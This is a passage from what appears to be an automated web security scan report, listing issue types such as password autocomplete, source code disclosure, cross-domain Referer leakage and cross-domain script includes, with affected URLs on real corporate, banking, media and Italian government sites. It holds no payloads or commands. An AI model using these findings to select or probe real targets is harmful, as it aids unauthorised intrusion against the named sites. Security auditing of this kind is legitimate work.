15.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.85. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

15.86. http://cp.mightyblue.com/default.asp

15.87. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB

15.88. http://d.adroll.com/view/0d742ed1925a733b1b33d771e0b2e1a8

15.89. http://del.icio.us/post

15.90. http://digg.com/submit

15.91. http://en.camera.it/

15.92. http://eni.com/en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml

15.93. http://eni.com/en_IT/company/culture-energy/figures/figures.shtml

15.94. http://eni.com/en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml

15.95. https://feedback.live.com/default.aspx

15.96. http://friendfeed.com/share

15.97. http://go.techtarget.com//clicktrack-r/activity/activity.gif

15.98. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

15.99. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

15.100. http://it.yahoo.com/add

15.101. http://local.virgilio.it/scripts/jquery.cookie.js

15.102. http://mail.alice.it/

15.103. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css

15.104. http://mail.alice.it/css/popup.css

15.105. http://mail.alice.it/css/stili.css

15.106. http://mail.alice.it/css/stili_overwrite.css

15.107. http://mail.alice.it/css/stili_stampa.css

15.108. http://mail.alice.it/images/bg_bottombox0.gif

15.109. http://mail.alice.it/images/bg_pop.jpg

15.110. http://mail.alice.it/images/bt_registrati00.gif

15.111. http://mail.alice.it/images/butt_registrati.png

15.112. http://mail.alice.it/images/header/immagine.png

15.113. http://mail.alice.it/images/ico_busta_link.gif

15.114. http://mail.alice.it/images/ico_disc_red.gif

15.115. http://mail.alice.it/images/ico_preferiti.gif

15.116. http://mail.alice.it/images/ico_stampa.gif

15.117. http://mail.alice.it/images/ico_vverde15.gif

15.118. http://mail.alice.it/images/ico_xrosso15.gif

15.119. http://mail.alice.it/js/scriptflash.js

15.120. http://media.fastclick.net/w/tre

15.121. http://media.techtarget.com/rms/ux/css/global.css

15.122. http://media.techtarget.com/rms/ux/css/searchcio-midmarket_new.css

15.123. http://media.techtarget.com/rms/ux/javascript/baynote-lib.js

15.124. http://media.techtarget.com/rms/ux/javascript/googleAnalytics.min.js

15.125. http://media.techtarget.com/rms/ux/javascript/ieFixScripts.js

15.126. http://media.techtarget.com/rms/ux/javascript/jquery-1.4.2.min.js

15.127. http://media.techtarget.com/rms/ux/javascript/jquery.writeCapture.js

15.128. http://media.techtarget.com/rms/ux/javascript/moScripts.js

15.129. http://media.techtarget.com/rms/ux/javascript/tt_scripts.js

15.130. http://media.techtarget.com/rms/ux/javascript/tt_thickbox-compressed.js

15.131. http://media.techtarget.com/rms/ux/javascript/writeCapture.js

15.132. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

15.133. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

15.134. http://nl.sitestat.com/elsevier/elsevier-com/s

15.135. http://nxtck.com/act.php

15.136. http://nxtck.com/act.php

15.137. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

15.138. http://pixel.rubiconproject.com/tap.php

15.139. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

15.140. http://sdc.eni.it/dcs67gfdv000000ggn52ira0x_5q6n/dcs.gif

15.141. http://search.yahoo.com/bin/search

15.142. http://searchstorage.techtarget.com/digitalguide/images/buttons/button_closeThisWindow.gif

15.143. http://secure-it.imrworldwide.com/cgi-bin/m

15.144. http://statse.webtrendslive.com/dcsjmy4y8000000w06qbhlh4j_1w6c/dcs.gif

15.145. http://translate.googleapis.com/translate_a/t

15.146. http://twitter.com/home

15.147. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm

15.148. http://www.aeronautica.difesa.it/4NOVEMBRE/PublishingImages/logo_4nov.jpg

15.149. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_0204.JPG

15.150. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5201.JPG

15.151. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5239.JPG

15.152. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5270.JPG

15.153. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5299.JPG

15.154. http://www.aeronautica.difesa.it/News/PublishingImages/Accademia%20Aeronautica%20ha%20giurato%20il%20corso%20nibbio%20ha%20giurato%20il%20corso%20nibbio%20V_210411/DSC_5322.JPG

15.155. http://www.aeronautica.difesa.it/News/PublishingImages/Video.jpg

15.156. http://www.aeronautica.difesa.it/ScriptResource.axd

15.157. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/admin.css

15.158. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/boxes.css

15.159. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/style.css

15.160. http://www.aeronautica.difesa.it/Style%20Library/AMI/css/styleit-IT.css

15.161. http://www.aeronautica.difesa.it/Style%20Library/AMI/javascript/AMIcore.js

15.162. http://www.aeronautica.difesa.it/Style%20Library/AMI/javascript/sunRiseSet.js

15.163. http://www.aeronautica.difesa.it/WebResource.axd

15.164. http://www.aeronautica.difesa.it/_layouts/1040/ie55up.js

15.165. http://www.aeronautica.difesa.it/_layouts/1040/init.js

15.166. http://www.aeronautica.difesa.it/_layouts/1040/msstring.js

15.167. http://www.aeronautica.difesa.it/_layouts/1040/styles/Menu.css

15.168. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_ContentHeader.jpg

15.169. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_LinkArrowsorange.gif

15.170. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_footer_v2.jpg

15.171. http://www.aeronautica.difesa.it/_layouts/AMI/images/bg_main_v2.jpg

15.172. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_body.gif

15.173. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_bottom.gif

15.174. http://www.aeronautica.difesa.it/_layouts/AMI/images/box_sx_top.gif

15.175. http://www.aeronautica.difesa.it/_layouts/AMI/images/clear.gif

15.176. http://www.aeronautica.difesa.it/_layouts/AMI/images/footer_dns.gif

15.177. http://www.aeronautica.difesa.it/_layouts/AMI/images/footer_logo.gif

15.178. http://www.aeronautica.difesa.it/_layouts/AMI/images/logodifesa.jpg

15.179. http://www.aeronautica.difesa.it/_layouts/AMI/images/menu/bg-subnav.png

15.180. http://www.aeronautica.difesa.it/_layouts/AMI/images/menu/nav-sprite.gif

15.181. http://www.altergaz.fr/

15.182. http://www.bing.com/

15.183. http://www.camera.it/

15.184. http://www.camera.it/1

15.185. http://www.distrigas.eu/

15.186. http://www.energyfordevelopment.it/

15.187. http://www.eni.com/

15.188. http://www.eni.com/'

15.189. http://www.eni.com/attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf

15.190. http://www.eni.com/attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf

15.191. http://www.eni.com/attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf

15.192. http://www.eni.com/attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf

15.193. http://www.eni.com/attachments/publications/reports/reports-2009/Eni-in-2009.pdf

15.194. http://www.eni.com/en_IT/static/css/images/controls.png

15.195. http://www.eni.com/en_IT/static/css/images/loading.gif

15.196. http://www.eni.com/en_IT/static/images/homepage_eni_com/login_active.png

15.197. http://www.eni.com/favicon.ico

15.198. http://www.eni.com/it_IT/static/css/mobile/mobile.css

15.199. http://www.eni.com/it_IT/www-eni-mobi/static/images/logo.gif

15.200. http://www.eni.it/

15.201. http://www.eni.it/mobile/page.do

15.202. http://www.eni.mobi/

15.203. http://zanox01.webtrekk.net/150772050830724/wt.pl

16. Password field with autocomplete enabled

16.1. https://account.musfiber.com/login.php

16.2. http://cp.mightyblue.com/

16.3. http://cp.mightyblue.com/default.asp

16.4. http://digg.com/submit

16.5. http://du.ilsole24ore.com/utenti/Registrazione.aspx

16.6. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

16.7. http://jsdotcom.ilsole24ore.com/js2010/common.min.js

16.8. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

16.9. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

16.10. http://mightyblue.com/

16.11. http://pf.rossoalice.alice.it/login.html

16.12. https://secure.mightyblue.com/default.asp

16.13. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

16.14. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

16.15. https://webshop.elsevier.com/login.cfm

16.16. https://webshop.elsevier.com/login.cfm

16.17. https://webshop.elsevier.com/login.cfm

16.18. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp

16.19. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

16.20. http://www.sciencedirect.com/science/journal/09574174

16.21. https://www.sciencedirect.com/science

16.22. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

16.23. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

16.24. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

16.25. http://www.telecomitalia.it/

16.26. http://www.telepass.it/ecm/faces/public/telepass/

16.27. http://www.zanox.com/en/

16.28. http://www.zanox.com/us/

17. Source code disclosure

17.1. http://kundenportal.aperto.de/download/zanox/zanox_intro_en.m4v

17.2. http://www.ansa.it/web/video/visual.swf

17.3. http://www.camera.it/javascripts/cache/Camera.94a1c77f6b66cfdcc9636f18c560a41e.js

17.4. https://www.webank.it/webankpub/wb/home.do

18. Referer-dependent response

18.1. http://use.typekit.com/k/prb2oqp-e.css

18.2. http://www.facebook.com/plugins/like.php

19. Cross-domain POST

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

20.2. http://ad.doubleclick.net/adj/els.SDguest/ISSN09574174

20.3. http://ad.doubleclick.net/adj/els.SDguest/ISSN09574174

20.4. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

20.5. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.6. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.7. http://ad.doubleclick.net/adj/sciom/DEFINITION

20.8. http://ad.it.doubleclick.net/adj/Ansa.Motori

20.9. http://ad.it.doubleclick.net/adj/Ansa.Motori

20.10. http://ad.it.doubleclick.net/adj/ansa.home

20.11. http://ad.it.doubleclick.net/adj/ansa.home

20.12. http://ad.it.doubleclick.net/adj/ansa.home

20.13. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1014632403@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.14. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1020182502@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1149407908@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.16. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1229708332@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.17. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1272227898@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.18. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1313196972@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.19. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1322546573@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.20. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1323604821@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.21. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1480769044@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.22. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1498101456@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.23. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1548590051@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.24. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.25. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1675862492@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.26. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1705065391@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.27. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1794618068@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.28. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1827877485@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.29. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1929539320@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.30. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1958204899@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

20.31. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_02_060_/_notizie_/_asia_oceania/1977279031@Top,VideoBox,VideoBox_2,VideoBox_180x150,MaxTicker_01,PopUp,PopUnder

20.32. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/luxury24/1185651268@MaxTicker_01,Top,VideoBox,SpotLight_01,SpotLight_02,SpotLight_03,HalfPage,PopUp,BackGround

20.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

20.34. http://expertsystem.net/clienti_dettaglio.asp

20.35. http://expertsystem.net/clienti_elenco.asp

20.36. http://expertsystem.net/clienti_home.asp

20.37. http://expertsystem.net/page.asp

20.38. http://expertsystem.net/page.asp

20.39. http://expertsystem.net/page.asp

20.40. http://expertsystem.net/page.asp

20.41. http://expertsystem.net/page.asp

20.42. http://fls.doubleclick.net/activityi

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

20.46. http://jsdotcom.ilsole24ore.com/sez2010/finanza-e-mercati/json/FinanzaMercatiUser/HPSole-FinanzaMercatiJS.js

20.47. http://nl.sitestat.com/elsevier/elsevier-com/s

20.48. http://s0.2mdn.net/1925925/091710sciomm_int_GapAnalysis.html

20.49. http://searchcio-midmarket.techtarget.com/

20.50. http://translate.googleapis.com/translate_a/t

20.51. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.52. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.53. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

20.54. http://webshop.elsevier.com/myarticleservices/booklets/

20.55. http://webshop.elsevier.com/specialissues/

20.56. http://www.bing.com/search

20.57. http://www.bing.com/search

20.58. http://www.bing.com/search

20.59. http://www.elsevier.com/order_issues

20.60. http://www.eni.com/en_IT/hp_dx_flash.html

20.61. http://www.eni.com/en_IT/hp_dx_tab.html

20.62. http://www.eni.it/mobile/page.do

20.63. http://www.eni.mobi/

20.64. http://www.facebook.com/plugins/like.php

20.65. http://www.ilsole24ore.com/

20.66. http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml

20.67. http://www.luxury24.ilsole24ore.com/

20.68. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

20.69. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

20.70. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

20.71. http://www.telecomitalia.it/sites/all/modules/custom/ti_auth/js/check.min.js

20.72. http://www.telepass.it/resources/custom/script/customffba.js

20.73. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N2886.Tribal_Fusion/B5403001.12

21.2. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1020182502@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.3. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1149407908@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.4. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1272227898@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.5. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1313196972@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.6. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1323604821@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.7. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1480769044@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.8. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1498101456@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.9. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1548590051@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.10. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.11. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.12. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1705065391@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.13. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1827877485@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.14. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1929539320@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1958204899@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

21.16. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_02_060_/_notizie_/_asia_oceania/1977279031@Top,VideoBox,VideoBox_2,VideoBox_180x150,MaxTicker_01,PopUp,PopUnder

21.17. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/luxury24/1185651268@MaxTicker_01,Top,VideoBox,SpotLight_01,SpotLight_02,SpotLight_03,HalfPage,PopUp,BackGround

21.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/766161316/VideoBox/OasDefault/Transition_SHP_b1_110502/8728887291.html/61646331643666333464626632633930

21.19. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1004777786@Top

21.20. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1042849514@Top

21.21. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1069815955@VideoBox

21.22. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1129870245@Top

21.23. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1234890180@VideoBox

21.24. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1265414101@Top

21.25. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1280012379@VideoBox

21.26. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1280277858@Top

21.27. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1284965279@VideoBox

21.28. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1292041577@VideoBox

